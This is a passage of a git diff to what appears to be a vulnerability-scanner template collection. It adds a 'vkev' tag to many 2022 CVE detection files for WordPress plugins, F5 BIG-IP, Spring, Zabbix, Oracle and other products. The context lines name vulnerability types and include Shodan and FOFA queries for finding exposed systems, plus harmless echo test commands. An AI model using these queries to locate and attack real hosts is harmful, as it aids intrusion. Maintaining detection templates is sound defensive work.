cve,cve2022,narnoo-distributor,wordpress,wp-plugin,wpscan,wp,rce,unauth,lfi,narnoo_distributor_project,vkev http: - raw: diff --git a/http/cves/2022/CVE-2022-0747.yaml b/http/cves/2022/CVE-2022-0747.yaml index 9ea6b47ccb3..a8956ac3334 100644 --- a/http/cves/2022/CVE-2022-0747.yaml +++ b/http/cves/2022/CVE-2022-0747.yaml @@ -29,7 +29,7 @@ info: vendor: quantumcloud product: infographic_maker framework: wordpress - tags: time-based-sqli,cve,cve2022,sqli,wordpress,wp-plugin,wp,infographic-and-list-builder-ilist,wpscan,quantumcloud + tags: time-based-sqli,cve,cve2022,sqli,wordpress,wp-plugin,wp,infographic-and-list-builder-ilist,wpscan,quantumcloud,vkev http: - raw: diff --git a/http/cves/2022/CVE-2022-0760.yaml b/http/cves/2022/CVE-2022-0760.yaml index 31b5e5a5680..fd6df571bb0 100644 --- a/http/cves/2022/CVE-2022-0760.yaml +++ b/http/cves/2022/CVE-2022-0760.yaml @@ -30,7 +30,7 @@ info: vendor: quantumcloud product: simple_link_directory framework: wordpress - tags: time-based-sqli,cve,cve2022,sqli,wordpress,wp-plugin,wp,simple-link-directory,unauth,wpscan,quantumcloud + tags: time-based-sqli,cve,cve2022,sqli,wordpress,wp-plugin,wp,simple-link-directory,unauth,wpscan,quantumcloud,vkev http: - raw: diff --git a/http/cves/2022/CVE-2022-0769.yaml b/http/cves/2022/CVE-2022-0769.yaml index 338388d1b47..409565b2cbe 100644 --- a/http/cves/2022/CVE-2022-0769.yaml +++ b/http/cves/2022/CVE-2022-0769.yaml @@ -30,7 +30,7 @@ info: vendor: usersultra product: users_ultra framework: wordpress - tags: time-based-sqli,cve,cve2022,wp,users-ultra,wpscan,sqli,wordpress,wp-plugin,usersultra + tags: time-based-sqli,cve,cve2022,wp,users-ultra,wpscan,sqli,wordpress,wp-plugin,usersultra,vkev http: - raw: diff --git a/http/cves/2022/CVE-2022-0781.yaml b/http/cves/2022/CVE-2022-0781.yaml index 797ca8c8427..8e1b500a111 100644 --- a/http/cves/2022/CVE-2022-0781.yaml +++ b/http/cves/2022/CVE-2022-0781.yaml @@ -30,7 +30,7 @@ info: vendor: nirweb product: nirweb_support framework: wordpress - tags: cve2022,cve,wordpress,wp-plugin,wp,sqli,wpscan,nirweb-support,unauth,nirweb + tags: cve2022,cve,wordpress,wp-plugin,wp,sqli,wpscan,nirweb-support,unauth,nirweb,vkev variables: num: "999999999" diff --git a/http/cves/2022/CVE-2022-0784.yaml b/http/cves/2022/CVE-2022-0784.yaml index 2b894b52bf7..351cb76a5b6 100644 --- a/http/cves/2022/CVE-2022-0784.yaml +++ b/http/cves/2022/CVE-2022-0784.yaml @@ -30,7 +30,7 @@ info: vendor: title_experiments_free_project product: title_experiments_free framework: wordpress - tags: time-based-sqli,cve2022,cve,wpscan,wp-plugin,wp,sqli,wp-experiments-free,unauth,wordpress,title_experiments_free_project + tags: time-based-sqli,cve2022,cve,wpscan,wp-plugin,wp,sqli,wp-experiments-free,unauth,wordpress,title_experiments_free_project,vkev http: - raw: diff --git a/http/cves/2022/CVE-2022-0786.yaml b/http/cves/2022/CVE-2022-0786.yaml index 435132ce168..6e5bdbcc315 100644 --- a/http/cves/2022/CVE-2022-0786.yaml +++ b/http/cves/2022/CVE-2022-0786.yaml @@ -30,7 +30,7 @@ info: vendor: iqonic product: kivicare framework: wordpress - tags: time-based-sqli,cve,cve2022,sqli,kivicare-clinic-management-system,unauth,wordpress,wp-plugin,wp,wpscan,iqonic + tags: time-based-sqli,cve,cve2022,sqli,kivicare-clinic-management-system,unauth,wordpress,wp-plugin,wp,wpscan,iqonic,vkev http: - raw: diff --git a/http/cves/2022/CVE-2022-0826.yaml b/http/cves/2022/CVE-2022-0826.yaml index fe24ccc7b19..a949fea598f 100644 --- a/http/cves/2022/CVE-2022-0826.yaml +++ b/http/cves/2022/CVE-2022-0826.yaml @@ -30,7 +30,7 @@ info: vendor: wp-video-gallery-free_project product: wp-video-gallery-free framework: wordpress - tags: time-based-sqli,cve,cve2022,wp-plugin,wpscan,wordpress,wp,sqli,wp-video-gallery-free,unauth,wp-video-gallery-free_project + tags: time-based-sqli,cve,cve2022,wp-plugin,wpscan,wordpress,wp,sqli,wp-video-gallery-free,unauth,wp-video-gallery-free_project,vkev http: - raw: diff --git a/http/cves/2022/CVE-2022-0827.yaml b/http/cves/2022/CVE-2022-0827.yaml index 9e6d3c60908..26bcf631360 100644 --- a/http/cves/2022/CVE-2022-0827.yaml +++ b/http/cves/2022/CVE-2022-0827.yaml @@ -30,7 +30,7 @@ info: vendor: presspage product: bestbooks framework: wordpress - tags: time-based-sqli,cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,bestbooks,unauthenticated,presspage + tags: time-based-sqli,cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,bestbooks,unauthenticated,presspage,vkev http: - raw: diff --git a/http/cves/2022/CVE-2022-0846.yaml b/http/cves/2022/CVE-2022-0846.yaml index a9d43f6c72f..2cbef2da338 100644 --- a/http/cves/2022/CVE-2022-0846.yaml +++ b/http/cves/2022/CVE-2022-0846.yaml @@ -29,7 +29,7 @@ info: vendor: speakout\!_email_petitions_project product: speakout\!_email_petitions framework: wordpress - tags: time-based-sqli,cve,cve2022,wordpress,wp-plugin,wp,unauth,wpscan,sqli,speakout,speakout-email-petitions,speakout\!_email_petitions_project + tags: time-based-sqli,cve,cve2022,wordpress,wp-plugin,wp,unauth,wpscan,sqli,speakout,speakout-email-petitions,speakout\!_email_petitions_project,vkev http: - raw: diff --git a/http/cves/2022/CVE-2022-0867.yaml b/http/cves/2022/CVE-2022-0867.yaml index f375d41ae87..28d17ce1663 100644 --- a/http/cves/2022/CVE-2022-0867.yaml +++ b/http/cves/2022/CVE-2022-0867.yaml @@ -30,7 +30,7 @@ info: vendor: reputeinfosystems product: pricing_table framework: wordpress - tags: time-based-sqli,cve,cve2022,unauth,wp,wordpress,wp-plugin,arprice-responsive-pricing-table,sqli,wpscan,reputeinfosystems + tags: time-based-sqli,cve,cve2022,unauth,wp,wordpress,wp-plugin,arprice-responsive-pricing-table,sqli,wpscan,reputeinfosystems,vkev http: - raw: diff --git a/http/cves/2022/CVE-2022-0885.yaml b/http/cves/2022/CVE-2022-0885.yaml index 9791617e8c6..3a4a39ad066 100644 --- a/http/cves/2022/CVE-2022-0885.yaml +++ b/http/cves/2022/CVE-2022-0885.yaml @@ -29,7 +29,7 @@ info: vendor: memberhero product: member_hero framework: wordpress - tags: cve,cve2022,unauth,wpscan,wp-plugin,rce,wp,wordpress,member-hero,memberhero + tags: cve,cve2022,unauth,wpscan,wp-plugin,rce,wp,wordpress,member-hero,memberhero,vkev http: - method: GET diff --git a/http/cves/2022/CVE-2022-0952.yaml b/http/cves/2022/CVE-2022-0952.yaml index 888bc1c9f7d..94a50021b66 100644 --- a/http/cves/2022/CVE-2022-0952.yaml +++ b/http/cves/2022/CVE-2022-0952.yaml @@ -30,7 +30,7 @@ info: vendor: sitemap_project product: sitemap framework: wordpress - tags: cve,cve2022,wp,wp-plugin,sitemap,wpscan,wordpress,sitemap_project + tags: cve,cve2022,wp,wp-plugin,sitemap,wpscan,wordpress,sitemap_project,vkev http: - raw: diff --git a/http/cves/2022/CVE-2022-1020.yaml b/http/cves/2022/CVE-2022-1020.yaml index 23eeaf5872d..c88a9b5f162 100644 --- a/http/cves/2022/CVE-2022-1020.yaml +++ b/http/cves/2022/CVE-2022-1020.yaml @@ -25,7 +25,7 @@ info: vendor: codeastrology product: woo_product_table framework: wordpress - tags: cve,cve2022,wpscan,wp,wp-plugin,wordpress,unauth,codeastrology + tags: cve,cve2022,wpscan,wp,wp-plugin,wordpress,unauth,codeastrology,vkev http: - raw: diff --git a/http/cves/2022/CVE-2022-1026.yaml b/http/cves/2022/CVE-2022-1026.yaml index 7cab118c6c3..1cf2e0dde25 100644 --- a/http/cves/2022/CVE-2022-1026.yaml +++ b/http/cves/2022/CVE-2022-1026.yaml @@ -22,7 +22,7 @@ info: product: net_viewer shodan-query: product:"Kyocera Printer Panel" max-request: 1 - tags: cve,cve2022,kyocera,exposure + tags: cve,cve2022,kyocera,exposure,vkev http: - raw: diff --git a/http/cves/2022/CVE-2022-1040.yaml b/http/cves/2022/CVE-2022-1040.yaml index 2539c31db67..f3d7947739b 100644 --- a/http/cves/2022/CVE-2022-1040.yaml +++ b/http/cves/2022/CVE-2022-1040.yaml @@ -34,7 +34,7 @@ info: - http.title:"sophos" fofa-query: title="sophos" google-query: intitle:"sophos" - tags: cve,cve2022,sophos,firewall,auth-bypass,rce,kev + tags: cve,cve2022,sophos,firewall,auth-bypass,rce,kev,vkev http: - method: POST diff --git a/http/cves/2022/CVE-2022-1221.yaml b/http/cves/2022/CVE-2022-1221.yaml index 8ed3e0974a9..3bd4012f74e 100644 --- a/http/cves/2022/CVE-2022-1221.yaml +++ b/http/cves/2022/CVE-2022-1221.yaml @@ -29,7 +29,7 @@ info: vendor: gwyn\'s_imagemap_selector_project product: gwyn\'s_imagemap_selector framework: wordpress - tags: cve,cve2022,wpscan,xss,wordpress,wp-plugin,wp,gwyn\'s_imagemap_selector_project + tags: cve,cve2022,wpscan,xss,wordpress,wp-plugin,wp,gwyn\'s_imagemap_selector_project,vkev http: - method: GET diff --git a/http/cves/2022/CVE-2022-1329.yaml b/http/cves/2022/CVE-2022-1329.yaml index 60d1891f9f6..9d415db61f0 100644 --- a/http/cves/2022/CVE-2022-1329.yaml +++ b/http/cves/2022/CVE-2022-1329.yaml @@ -29,7 +29,7 @@ info: vendor: elementor product: website_builder framework: wordpress - tags: cve2022,cve,rce,wordpress,wp-plugin,wp,elementor,authenticated,intrusive,fileupload + tags: cve2022,cve,rce,wordpress,wp-plugin,wp,elementor,authenticated,intrusive,fileupload,vkev http: - raw: diff --git a/http/cves/2022/CVE-2022-1386.yaml b/http/cves/2022/CVE-2022-1386.yaml index 3ef7d747a63..b4c1a0d453e 100644 --- a/http/cves/2022/CVE-2022-1386.yaml +++ b/http/cves/2022/CVE-2022-1386.yaml @@ -29,7 +29,7 @@ info: vendor: fusion_builder_project product: fusion_builder framework: wordpress - tags: cve,cve2022,wpscan,wordpress,ssrf,themefusion,wp,fusion,avada,intrusive,theme-fusion,fusion_builder_project + tags: cve,cve2022,wpscan,wordpress,ssrf,themefusion,wp,fusion,avada,intrusive,theme-fusion,fusion_builder_project,vkev http: - raw: diff --git a/http/cves/2022/CVE-2022-1388.yaml b/http/cves/2022/CVE-2022-1388.yaml index a269a096234..be96c8bba3f 100644 --- a/http/cves/2022/CVE-2022-1388.yaml +++ b/http/cves/2022/CVE-2022-1388.yaml @@ -34,7 +34,7 @@ info: - http.title:"big-ip®-+redirect" +"server" fofa-query: title="big-ip®-+redirect" +"server" google-query: intitle:"big-ip®-+redirect" +"server" - tags: cve,cve2022,f5,bigip,rce,mirai,kev + tags: cve,cve2022,f5,bigip,rce,mirai,kev,vkev variables: auth: "admin:" cmd: "echo CVE-2022-1388 | rev" diff --git a/http/cves/2022/CVE-2022-1390.yaml b/http/cves/2022/CVE-2022-1390.yaml index 9d41257e0bc..6630332ef47 100644 --- a/http/cves/2022/CVE-2022-1390.yaml +++ b/http/cves/2022/CVE-2022-1390.yaml @@ -29,7 +29,7 @@ info: vendor: admin_word_count_column_project product: admin_word_count_column framework: wordpress - tags: cve,cve2022,packetstorm,wpscan,wordpress,wp-plugin,lfi,wp,admin_word_count_column_project + tags: cve,cve2022,packetstorm,wpscan,wordpress,wp-plugin,lfi,wp,admin_word_count_column_project,vkev http: - method: GET diff --git a/http/cves/2022/CVE-2022-1391.yaml b/http/cves/2022/CVE-2022-1391.yaml index a269ebeda81..509b5b1c309 100644 --- a/http/cves/2022/CVE-2022-1391.yaml +++ b/http/cves/2022/CVE-2022-1391.yaml @@ -29,7 +29,7 @@ info: vendor: kanev product: cab_fare_calculator framework: wordpress - tags: cve,cve2022,wordpress,wp-plugin,lfi,wp,edb,wpscan,kanev + tags: cve,cve2022,wordpress,wp-plugin,lfi,wp,edb,wpscan,kanev,vkev http: - method: GET diff --git a/http/cves/2022/CVE-2022-1439.yaml b/http/cves/2022/CVE-2022-1439.yaml index 00b5632fa85..f95d3de9b60 100644 --- a/http/cves/2022/CVE-2022-1439.yaml +++ b/http/cves/2022/CVE-2022-1439.yaml @@ -33,7 +33,7 @@ info: fofa-query: - body="microweber" - icon_hash=780351152 - tags: cve,cve2022,microweber,xss,huntr + tags: cve,cve2022,microweber,xss,huntr,vkev http: - method: GET diff --git a/http/cves/2022/CVE-2022-1609.yaml b/http/cves/2022/CVE-2022-1609.yaml index ed3f2c97e4d..fb3aaaefcc4 100644 --- a/http/cves/2022/CVE-2022-1609.yaml +++ b/http/cves/2022/CVE-2022-1609.yaml @@ -29,7 +29,7 @@ info: vendor: weblizar product: school_management framework: wordpress - tags: cve,cve2022,rce,wp,backdoor,wpscan,wordpress,weblizar + tags: cve,cve2022,rce,wp,backdoor,wpscan,wordpress,weblizar,vkev variables: cmd: "echo CVE-2022-1609 | rev" diff --git a/http/cves/2022/CVE-2022-1768.yaml b/http/cves/2022/CVE-2022-1768.yaml index acdee3d19c7..f39982c4658 100644 --- a/http/cves/2022/CVE-2022-1768.yaml +++ b/http/cves/2022/CVE-2022-1768.yaml @@ -30,7 +30,7 @@ info: vendor: carrcommunications product: rsvpmaker framework: wordpress - tags: time-based-sqli,cve,cve2022,wordpress,wp-plugin,wp,sqli,rsvpmaker,carrcommunications + tags: time-based-sqli,cve,cve2022,wordpress,wp-plugin,wp,sqli,rsvpmaker,carrcommunications,vkev http: - raw: diff --git a/http/cves/2022/CVE-2022-1883.yaml b/http/cves/2022/CVE-2022-1883.yaml index ba5646a055f..59f2211a6d4 100644 --- a/http/cves/2022/CVE-2022-1883.yaml +++ b/http/cves/2022/CVE-2022-1883.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: camptocamp product: terraboard - tags: time-based-sqli,cve,cve2022,terraboard,sqli,huntr,camptocamp + tags: time-based-sqli,cve,cve2022,terraboard,sqli,huntr,camptocamp,vkev http: - raw: diff --git a/http/cves/2022/CVE-2022-1903.yaml b/http/cves/2022/CVE-2022-1903.yaml index dc2f928a491..5e57e0e511b 100644 --- a/http/cves/2022/CVE-2022-1903.yaml +++ b/http/cves/2022/CVE-2022-1903.yaml @@ -29,7 +29,7 @@ info: vendor: armemberplugin product: armember framework: wordpress - tags: cve,cve2022,account-takeover,wpscan,wordpress,wp-plugin,wp,armember-membership,unauthenticated,armemberplugin + tags: cve,cve2022,account-takeover,wpscan,wordpress,wp-plugin,wp,armember-membership,unauthenticated,armemberplugin,vkev http: - raw: diff --git a/http/cves/2022/CVE-2022-1916.yaml b/http/cves/2022/CVE-2022-1916.yaml index db4bfbb2eb1..fb9f8ba9438 100644 --- a/http/cves/2022/CVE-2022-1916.yaml +++ b/http/cves/2022/CVE-2022-1916.yaml @@ -28,7 +28,7 @@ info: vendor: pluginus product: woot framework: wordpress - tags: cve,cve2022,wordpress,wp-plugin,xss,wpscan,wp,pluginus + tags: cve,cve2022,wordpress,wp-plugin,xss,wpscan,wp,pluginus,vkev http: - method: GET diff --git a/http/cves/2022/CVE-2022-1950.yaml b/http/cves/2022/CVE-2022-1950.yaml index 6973f8e9808..6a6b8e25f72 100644 --- a/http/cves/2022/CVE-2022-1950.yaml +++ b/http/cves/2022/CVE-2022-1950.yaml @@ -24,7 +24,7 @@ info: product: youzify framework: wordpress fofa-query: body="/wp-content/plugins/youzify" - tags: cve,cve2022,youzify,wp,wp-plugin,wordpress,sqli,time-based-sqli + tags: cve,cve2022,youzify,wp,wp-plugin,wordpress,sqli,time-based-sqli,vkev http: - raw: diff --git a/http/cves/2022/CVE-2022-1952.yaml b/http/cves/2022/CVE-2022-1952.yaml index 8ddd602b7c8..b7433fadbd8 100644 --- a/http/cves/2022/CVE-2022-1952.yaml +++ b/http/cves/2022/CVE-2022-1952.yaml @@ -30,7 +30,7 @@ info: vendor: syntactics product: free_booking_plugin_for_hotels\,_restaurant_and_car_rental framework: wordpress - tags: cve,cve2022,wpscan,wordpress,easync-booking,unauth,wp,file-upload,wp-plugin,intrusive,syntactics + tags: cve,cve2022,wpscan,wordpress,easync-booking,unauth,wp,file-upload,wp-plugin,intrusive,syntactics,vkev variables: string: "CVE-2022-1952" diff --git a/http/cves/2022/CVE-2022-21371.yaml b/http/cves/2022/CVE-2022-21371.yaml index 8893c021c07..7644be85b8c 100644 --- a/http/cves/2022/CVE-2022-21371.yaml +++ b/http/cves/2022/CVE-2022-21371.yaml @@ -32,7 +32,7 @@ info: - product:"oracle weblogic" fofa-query: title="oracle peoplesoft sign-in" google-query: intitle:"oracle peoplesoft sign-in" - tags: cve,cve2022,lfi,weblogic,oracle,packetstorm + tags: cve,cve2022,lfi,weblogic,oracle,packetstorm,vkev http: - method: GET diff --git a/http/cves/2022/CVE-2022-21500.yaml b/http/cves/2022/CVE-2022-21500.yaml index 0d1755abf29..25ae2cff9d4 100644 --- a/http/cves/2022/CVE-2022-21500.yaml +++ b/http/cves/2022/CVE-2022-21500.yaml @@ -33,7 +33,7 @@ info: - http.title:"login" "x-oracle-dms-ecid" 200 fofa-query: title="login" "x-oracle-dms-ecid" 200 google-query: intitle:"login" "x-oracle-dms-ecid" 200 - tags: cve,cve2022,oracle,misconfig,auth-bypass + tags: cve,cve2022,oracle,misconfig,auth-bypass,vkev http: - method: GET diff --git a/http/cves/2022/CVE-2022-21587.yaml b/http/cves/2022/CVE-2022-21587.yaml index 4aee0601fce..d2e05a8825a 100644 --- a/http/cves/2022/CVE-2022-21587.yaml +++ b/http/cves/2022/CVE-2022-21587.yaml @@ -29,7 +29,7 @@ info: shodan-query: http.title:"login" "x-oracle-dms-ecid" 200 fofa-query: title="login" "x-oracle-dms-ecid" 200 google-query: intitle:"login" "x-oracle-dms-ecid" 200 - tags: cve,cve2022,intrusive,ebs,unauth,kev,rce,oast,oracle,packetstorm + tags: cve,cve2022,intrusive,ebs,unauth,kev,rce,oast,oracle,packetstorm,vkev http: - raw: diff --git a/http/cves/2022/CVE-2022-21661.yaml b/http/cves/2022/CVE-2022-21661.yaml index 96ab90845f6..8b904f9a53b 100644 --- a/http/cves/2022/CVE-2022-21661.yaml +++ b/http/cves/2022/CVE-2022-21661.yaml @@ -31,7 +31,7 @@ info: shodan-query: - cpe:"cpe:2.3:a:wordpress:wordpress" - http.component:"wordpress" - tags: cve2022,cve,wp,sqli,wpquery,wpscan,packetstorm,wordpress + tags: cve2022,cve,wp,sqli,wpquery,wpscan,packetstorm,wordpress,vkev http: - raw: diff --git a/http/cves/2022/CVE-2022-22242.yaml b/http/cves/2022/CVE-2022-22242.yaml index bba62250f00..aa52bc8957a 100644 --- a/http/cves/2022/CVE-2022-22242.yaml +++ b/http/cves/2022/CVE-2022-22242.yaml @@ -34,7 +34,7 @@ info: - http.title:"juniper web device manager" fofa-query: title="juniper web device manager" google-query: intitle:"juniper web device manager" - tags: cve2022,cve,xss,juniper,junos + tags: cve2022,cve,xss,juniper,junos,vkev http: - method: GET diff --git a/http/cves/2022/CVE-2022-22536.yaml b/http/cves/2022/CVE-2022-22536.yaml index f66df956fad..bad090d83ee 100644 --- a/http/cves/2022/CVE-2022-22536.yaml +++ b/http/cves/2022/CVE-2022-22536.yaml @@ -29,7 +29,7 @@ info: product: content_server shodan-query: http.favicon.hash:-266008933 fofa-query: icon_hash=-266008933 - tags: cve,cve2022,sap,smuggling,netweaver,web-dispatcher,memory-pipes,kev + tags: cve,cve2022,sap,smuggling,netweaver,web-dispatcher,memory-pipes,kev,vkev http: - raw: diff --git a/http/cves/2022/CVE-2022-22897.yaml b/http/cves/2022/CVE-2022-22897.yaml index 97a5b3dc703..01be7b69006 100644 --- a/http/cves/2022/CVE-2022-22897.yaml +++ b/http/cves/2022/CVE-2022-22897.yaml @@ -31,7 +31,7 @@ info: shodan-query: - "http.component:\"Prestashop\"" - http.component:"prestashop" - tags: time-based-sqli,cve,cve2022,packetstorm,prestashop,sqli,unauth,apollotheme + tags: time-based-sqli,cve,cve2022,packetstorm,prestashop,sqli,unauth,apollotheme,vkev http: - raw: diff --git a/http/cves/2022/CVE-2022-22947.yaml b/http/cves/2022/CVE-2022-22947.yaml index 391863520ab..35598ec64e6 100644 --- a/http/cves/2022/CVE-2022-22947.yaml +++ b/http/cves/2022/CVE-2022-22947.yaml @@ -27,7 +27,7 @@ info: max-request: 3 vendor: vmware product: spring_cloud_gateway - tags: cve,cve2022,apache,spring,vmware,actuator,oast,kev + tags: cve,cve2022,apache,spring,vmware,actuator,oast,kev,vkev http: - raw: diff --git a/http/cves/2022/CVE-2022-22954.yaml b/http/cves/2022/CVE-2022-22954.yaml index ae1b4de8c0e..506ad302685 100644 --- a/http/cves/2022/CVE-2022-22954.yaml +++ b/http/cves/2022/CVE-2022-22954.yaml @@ -31,7 +31,7 @@ info: fofa-query: - icon_hash=-1250474341 - app="vmware-workspace-one-access" || app="vmware-identity-manager" || app="vmware-vrealize" - tags: cve2022,cve,workspaceone,kev,tenable,packetstorm,vmware,ssti + tags: cve2022,cve,workspaceone,kev,tenable,packetstorm,vmware,ssti,vkev http: - method: GET diff --git a/http/cves/2022/CVE-2022-22963.yaml b/http/cves/2022/CVE-2022-22963.yaml index 74537cf05b0..6e6f5b725e6 100644 --- a/http/cves/2022/CVE-2022-22963.yaml +++ b/http/cves/2022/CVE-2022-22963.yaml @@ -29,7 +29,7 @@ info: max-request: 1 vendor: vmware product: spring_cloud_function - tags: cve,cve2022,vulhub,springcloud,rce,kev,vmware + tags: cve,cve2022,vulhub,springcloud,rce,kev,vmware,vkev http: - raw: diff --git a/http/cves/2022/CVE-2022-22965.yaml b/http/cves/2022/CVE-2022-22965.yaml index 563dd78a19d..32ed01a2f5a 100644 --- a/http/cves/2022/CVE-2022-22965.yaml +++ b/http/cves/2022/CVE-2022-22965.yaml @@ -28,7 +28,7 @@ info: max-request: 4 vendor: vmware product: spring_framework - tags: cve2022,cve,rce,spring,injection,oast,intrusive,kev,vmware + tags: cve2022,cve,rce,spring,injection,oast,intrusive,kev,vmware,vkev http: - raw: diff --git a/http/cves/2022/CVE-2022-23131.yaml b/http/cves/2022/CVE-2022-23131.yaml index accf72c1da9..69c2f61c48c 100644 --- a/http/cves/2022/CVE-2022-23131.yaml +++ b/http/cves/2022/CVE-2022-23131.yaml @@ -36,7 +36,7 @@ info: - app="zabbix-监控系统" && body="saml" - title="zabbix-server" google-query: intitle:"zabbix-server" - tags: cve,cve2022,zabbix,auth-bypass,saml,sso,kev + tags: cve,cve2022,zabbix,auth-bypass,saml,sso,kev,vkev http: - method: GET diff --git a/http/cves/2022/CVE-2022-23134.yaml b/http/cves/2022/CVE-2022-23134.yaml index e9341564c3e..e56286d3ce9 100644 --- a/http/cves/2022/CVE-2022-23134.yaml +++ b/http/cves/2022/CVE-2022-23134.yaml @@ -36,7 +36,7 @@ info: - app="zabbix-监控系统" && body="saml" - title="zabbix-server" google-query: intitle:"zabbix-server" - tags: cve,cve2022,zabbix,auth-bypass,kev + tags: cve,cve2022,zabbix,auth-bypass,kev,vkev http: - method: GET diff --git a/http/cves/2022/CVE-2022-2314.yaml b/http/cves/2022/CVE-2022-2314.yaml index 3e014a562d1..8d7beaa8fdc 100644 --- a/http/cves/2022/CVE-2022-2314.yaml +++ b/http/cves/2022/CVE-2022-2314.yaml @@ -29,7 +29,7 @@ info: vendor: vr_calendar_project product: vr_calendar framework: wordpress - tags: cve,cve2022,wordpress,wp,wp-plugin,rce,vr-calendar-sync,unauth,wpscan,vr_calendar_project + tags: cve,cve2022,wordpress,wp,wp-plugin,rce,vr-calendar-sync,unauth,wpscan,vr_calendar_project,vkev http: - raw: diff --git a/http/cves/2022/CVE-2022-23178.yaml b/http/cves/2022/CVE-2022-23178.yaml index 8ebe06d3538..45fa36052ad 100644 --- a/http/cves/2022/CVE-2022-23178.yaml +++ b/http/cves/2022/CVE-2022-23178.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: crestron product: hd-md4x2-4k-e_firmware - tags: cve,cve2022,crestron,disclosure + tags: cve,cve2022,crestron,disclosure,vkev http: - method: GET diff --git a/http/cves/2022/CVE-2022-23347.yaml b/http/cves/2022/CVE-2022-23347.yaml index c2531fb0c95..ecaa59039e8 100644 --- a/http/cves/2022/CVE-2022-23347.yaml +++ b/http/cves/2022/CVE-2022-23347.yaml @@ -32,7 +32,7 @@ info: - http.html:"BigAnt" - http.html:"bigant" fofa-query: body="bigant" - tags: cve,cve2022,bigant,lfi,bigantsoft + tags: cve,cve2022,bigant,lfi,bigantsoft,vkev http: - method: GET diff --git a/http/cves/2022/CVE-2022-23397.yaml b/http/cves/2022/CVE-2022-23397.yaml index 61fbac020fd..95bcd866fd5 100644 --- a/http/cves/2022/CVE-2022-23397.yaml +++ b/http/cves/2022/CVE-2022-23397.yaml @@ -24,7 +24,7 @@ info: product: ez-net_portal shodan-query: "EZNET_" fofa-query: "EZNET_" - tags: cve,cve2022,cedar,eznet,xss + tags: cve,cve2022,cedar,eznet,xss,vkev http: - method: GET diff --git a/http/cves/2022/CVE-2022-2376.yaml b/http/cves/2022/CVE-2022-2376.yaml index 58b972faa35..b63ad71bb26 100644 --- a/http/cves/2022/CVE-2022-2376.yaml +++ b/http/cves/2022/CVE-2022-2376.yaml @@ -27,7 +27,7 @@ info: vendor: wpwax product: directorist framework: wordpress - tags: cve,cve2022,wp-plugin,wpscan,wordpress,wp,directorist,unauth,disclosure,wpwax + tags: cve,cve2022,wp-plugin,wpscan,wordpress,wp,directorist,unauth,disclosure,wpwax,vkev http: - method: GET diff --git a/http/cves/2022/CVE-2022-2383.yaml b/http/cves/2022/CVE-2022-2383.yaml index 1190cb4b7a7..8061f26b820 100644 --- a/http/cves/2022/CVE-2022-2383.yaml +++ b/http/cves/2022/CVE-2022-2383.yaml @@ -30,7 +30,7 @@ info: vendor: slickremix product: "feed_them_social" framework: wordpress - tags: cve,cve2022,wp,wordpress,wp-plugin,wpscan,xss,slickremix + tags: cve,cve2022,wp,wordpress,wp-plugin,wpscan,xss,slickremix,vkev flow: http(1) && http(2) http: diff --git a/http/cves/2022/CVE-2022-24112.yaml b/http/cves/2022/CVE-2022-24112.yaml index 495b4fc835e..640c1ae3f14 100644 --- a/http/cves/2022/CVE-2022-24112.yaml +++ b/http/cves/2022/CVE-2022-24112.yaml @@ -33,7 +33,7 @@ info: - title="Apache APISIX Dashboard" - title="apache apisix dashboard" google-query: intitle:"apache apisix dashboard" - tags: cve,cve2022,apache,rce,apisix,oast,kev,intrusive + tags: cve,cve2022,apache,rce,apisix,oast,kev,intrusive,vkev http: - raw: diff --git a/http/cves/2022/CVE-2022-2414.yaml b/http/cves/2022/CVE-2022-2414.yaml index 01c75c860db..e4c23529850 100644 --- a/http/cves/2022/CVE-2022-2414.yaml +++ b/http/cves/2022/CVE-2022-2414.yaml @@ -35,7 +35,7 @@ info: - title="identity management" - title="identity management" html:"freeipa" google-query: intitle:"identity management" html:"freeipa" - tags: cve,cve2022,dogtag,freeipa,xxe,dogtagpki + tags: cve,cve2022,dogtag,freeipa,xxe,dogtagpki,vkev http: - raw: diff --git a/http/cves/2022/CVE-2022-24260.yaml b/http/cves/2022/CVE-2022-24260.yaml index c5ef827bf4b..be58a5bdf61 100644 --- a/http/cves/2022/CVE-2022-24260.yaml +++ b/http/cves/2022/CVE-2022-24260.yaml @@ -32,7 +32,7 @@ info: - http.title:"voipmonitor" fofa-query: title="voipmonitor" google-query: intitle:"voipmonitor" - tags: cve,cve2022,voipmonitor,sqli,unauth + tags: cve,cve2022,voipmonitor,sqli,unauth,vkev http: - raw: diff --git a/http/cves/2022/CVE-2022-24288.yaml b/http/cves/2022/CVE-2022-24288.yaml index abeedae45b5..956163e45f8 100644 --- a/http/cves/2022/CVE-2022-24288.yaml +++ b/http/cves/2022/CVE-2022-24288.yaml @@ -40,7 +40,7 @@ info: google-query: - intitle:"sign in - airflow" - intitle:"airflow - dags" || http.html:"apache airflow" - tags: cve,cve2022,airflow,rce,apache + tags: cve,cve2022,airflow,rce,apache,vkev http: - method: GET diff --git a/http/cves/2022/CVE-2022-2461.yaml b/http/cves/2022/CVE-2022-2461.yaml index d5e332b7014..f27a6a324a9 100644 --- a/http/cves/2022/CVE-2022-2461.yaml +++ b/http/cves/2022/CVE-2022-2461.yaml @@ -27,7 +27,7 @@ info: framework: wordpress publicwww-query: "/wp-content/plugins/transposh-translation-filter-for-wordpress/" fofa-query: body="/wp-content/plugins/transposh-translation-filter-for-wordpress/" - tags: cve,cve2022,wordpress,wp-plugin,wp,wpscan,transposh-translation-filter-for-wordpress,info-leak + tags: cve,cve2022,wordpress,wp-plugin,wp,wpscan,transposh-translation-filter-for-wordpress,info-leak,vkev variables: redirect_uri: "oast.me" diff --git a/http/cves/2022/CVE-2022-24716.yaml b/http/cves/2022/CVE-2022-24716.yaml index f72f89c8f04..2963b6410e0 100644 --- a/http/cves/2022/CVE-2022-24716.yaml +++ b/http/cves/2022/CVE-2022-24716.yaml @@ -37,7 +37,7 @@ info: google-query: - intitle:"icinga" - intitle:"icinga web 2 login" - tags: cve,cve2022,packetstorm,icinga,lfi + tags: cve,cve2022,packetstorm,icinga,lfi,vkev http: - method: GET diff --git a/http/cves/2022/CVE-2022-24816.yaml b/http/cves/2022/CVE-2022-24816.yaml index 0c2a7fee3ae..2932f67d3b7 100644 --- a/http/cves/2022/CVE-2022-24816.yaml +++ b/http/cves/2022/CVE-2022-24816.yaml @@ -32,7 +32,7 @@ info: fofa-query: - app="GeoServer" - app="geoserver" - tags: cve,cve2022,geoserver,rce,geosolutionsgroup,kev + tags: 